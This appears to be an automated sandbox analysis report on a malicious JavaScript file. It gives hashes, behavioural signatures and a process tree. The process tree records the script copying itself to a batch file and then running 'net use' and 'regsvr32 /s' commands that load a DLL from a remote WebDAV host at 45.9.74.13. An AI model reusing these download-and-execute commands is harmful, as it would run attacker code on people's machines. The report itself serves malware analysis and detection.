Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
11/07/2024, 14:44
Static task
static1
Behavioral task
behavioral1
Sample
319082727724431627.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
319082727724431627.js
Resource
win10v2004-20240704-en
General
-
Target
319082727724431627.js
-
Size
14KB
-
MD5
26bfd4afef5ef8710dc37a03d1b47cde
-
SHA1
bc88b70ff50a268c1ef112249301226e13dd0a4f
-
SHA256
814fa59f3420fbc00590ea9d7bfae22cf321f9a4a2651afc7a1c036460bda10b
-
SHA512
5d8156a431ec261c853c54fca9be36d92fd5ab3165c0248108d7fc1a1a6422f9e92c4dea2d239144d58a08a3b60cd9c481b8f7291365e79d78dd6f144d65dbcc
-
SSDEEP
96:c0nWLVc/oYXtCaDfv9++3/Vv9++niebnzxMcq8PNtyAmZGp2gmC7cfhtzogcSeyA:aLVcN1++d1++nTzxMw23Omk/F
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2172 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1856 wrote to memory of 3016 1856 wscript.exe 30 PID 1856 wrote to memory of 3016 1856 wscript.exe 30 PID 1856 wrote to memory of 3016 1856 wscript.exe 30 PID 3016 wrote to memory of 3060 3016 cmd.exe 32 PID 3016 wrote to memory of 3060 3016 cmd.exe 32 PID 3016 wrote to memory of 3060 3016 cmd.exe 32 PID 3016 wrote to memory of 2172 3016 cmd.exe 33 PID 3016 wrote to memory of 2172 3016 cmd.exe 33 PID 3016 wrote to memory of 2172 3016 cmd.exe 33 PID 3016 wrote to memory of 2172 3016 cmd.exe 33 PID 3016 wrote to memory of 2172 3016 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\319082727724431627.js1⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\319082727724431627.js" "C:\Users\Admin\AppData\Local\Temp\\reflectiveserioustrains.bat" && "C:\Users\Admin\AppData\Local\Temp\\reflectiveserioustrains.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3060
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\530.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2172
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD526bfd4afef5ef8710dc37a03d1b47cde
SHA1bc88b70ff50a268c1ef112249301226e13dd0a4f
SHA256814fa59f3420fbc00590ea9d7bfae22cf321f9a4a2651afc7a1c036460bda10b
SHA5125d8156a431ec261c853c54fca9be36d92fd5ab3165c0248108d7fc1a1a6422f9e92c4dea2d239144d58a08a3b60cd9c481b8f7291365e79d78dd6f144d65dbcc